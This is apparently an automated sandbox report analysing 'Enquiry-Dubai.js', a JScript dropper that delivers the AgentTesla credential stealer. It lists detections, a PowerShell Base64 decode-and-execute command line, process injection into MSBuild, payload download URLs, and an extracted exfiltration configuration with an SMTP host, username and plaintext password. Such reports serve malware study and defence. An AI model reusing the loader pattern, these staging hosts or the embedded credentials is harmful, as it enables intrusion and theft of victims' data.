Windows Analysis Report
Enquiry-Dubai.js

Overview

General Information

Sample name: Enquiry-Dubai.js
Analysis ID: 1646313
MD5: 5e554206a8a10362c32d4f106ce72a98
SHA1: 9a7ab75af22bb0ed7e0a3feb49eef5cff3d22aba
SHA256: 61d6d15b22aed7572cca9b5785f07f02eec562a4142c2fb8605dabc89d7710b5
Tags: js, user-contact4abubaker
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Classification chart axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; legend: clean, suspicious, malicious
  • System is w10x64
  • wscript.exe (PID: 7544 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = '[...]'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('slanshacks','A'))); Invoke-Expression $OWjuxd"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 3028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{
  "Exfil Mode": "SMTP",
  "Port": "587",
  "Host": "mail.detarcoopmedical.com",
  "Username": "mail@detarcoopmedical.com",
  "Password": "To$zL%?nhDHN"
}
Source | Rule | Description | Author | Strings
0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
10.2.MSBuild.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10.2.MSBuild.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x34881:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x348f3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3497d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x34a0f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x34a79:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x34aeb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34b81:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34c11:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.powershell.exe.1ae117de740.7.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
7.2.powershell.exe.1ae117de740.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
amsi64_8188.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_8188.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

                        Networking

                        Source: Network Connection; Author: Joe Security; Data: DestinationIp: 161.97.124.96, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3028, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49725

                        System Summary

                        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = '[...]
                        Source: Network Connection; Author: Kiran kumar s, oscd.community; Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3028, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49724
                        Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", ProcessId: 7544, ProcessName: wscript.exe
                        Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", ProcessId: 7544, ProcessName: wscript.exe
                        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = '[...]
                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2025-03-23T21:49:03.955868+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 172.66.0.235 | 443 | 192.168.2.4 | 49723 | TCP
                        2025-03-23T21:49:04.104187+0100 | 2057635 | 1 | A Network Trojan was detected | 172.66.0.235 | 443 | 192.168.2.4 | 49723 | TCP
                        2025-03-23T21:49:02.447982+0100 | 2049038 | 1 | A Network Trojan was detected | 207.241.227.224 | 443 | 192.168.2.4 | 49716 | TCP
                        2025-03-23T21:49:04.104187+0100 | 2858295 | 1 | A Network Trojan was detected | 172.66.0.235 | 443 | 192.168.2.4 | 49723 | TCP

                        AV Detection

                        Source: 10.2.MSBuild.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.detarcoopmedical.com", "Username": "mail@detarcoopmedical.com", "Password": "To$zL%?nhDHN"}
                        Source: unknown; HTTPS traffic detected: 207.241.227.224:443 -> 192.168.2.4:49716 version: TLS 1.2
                        Source: unknown; HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
                        Source: unknown; HTTPS traffic detected: 172.66.0.235:443 -> 192.168.2.4:49723 version: TLS 1.2

                        Software Vulnerabilities

                        Source: Enquiry-Dubai.js | Argument value: ['"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: Enquiry-Dubai.js | Argument value: ['"WScript.Shell"', '"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: Enquiry-Dubai.js | Return value: ['"WScript.Shell"', '"powershell -NoProfile -Command ""$Codigo = \'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslansha']
                        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.66.0.235:443 -> 192.168.2.4:49723
                        Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.66.0.235:443 -> 192.168.2.4:49723
                        Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.66.0.235:443 -> 192.168.2.4:49723
                        Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 207.241.227.224:443 -> 192.168.2.4:49716
                        Source: global traffic | TCP traffic: 192.168.2.4:49725 -> 161.97.124.96:587
                        Source: global traffic | HTTP traffic detected: GET /25/items/new_image_20250318/new_image.jpg HTTP/1.1 Host: ia600204.us.archive.org Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /223.txt HTTP/1.1 Host: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: Joe Sandbox View | IP Address: 208.95.112.1
                        Source: Joe Sandbox View | IP Address: 172.66.0.235
                        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                        Source: Joe Sandbox View | ASN Name: CONTABODE
                        Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknown | DNS query: name: ip-api.com
                        Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: */* If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
                        Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: */* If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
                        Source: global traffic | DNS traffic detected: DNS query: ia600204.us.archive.org
                        Source: global traffic | DNS traffic detected: DNS query: c.pki.goog
                        Source: global traffic | DNS traffic detected: DNS query: pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                        Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                        Source: global traffic | DNS traffic detected: DNS query: mail.detarcoopmedical.com
                        Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknown Network traffic detected: HTTP traffic on port 49680 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknown HTTPS traffic detected: 207.241.227.224:443 -> 192.168.2.4:49716 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 172.66.0.235:443 -> 192.168.2.4:49723 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, hxAF.cs .Net Code: Vb7

                        System Summary

                        Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
                        Source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
                        Source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution. Author: ditekSHen
                        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = '…
                        Source: Enquiry-Dubai.js Initial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 10829
                        Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, N43UVggPg.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, N43UVggPg.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, Ow96S4wT.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, MjzNdC.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winJS@6/3@5/4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcjk5g0n.p3f.ps1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                        Source: Enquiry-Dubai.js Static file information: File size 1362606 > 1048576
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp

                        Data Obfuscation

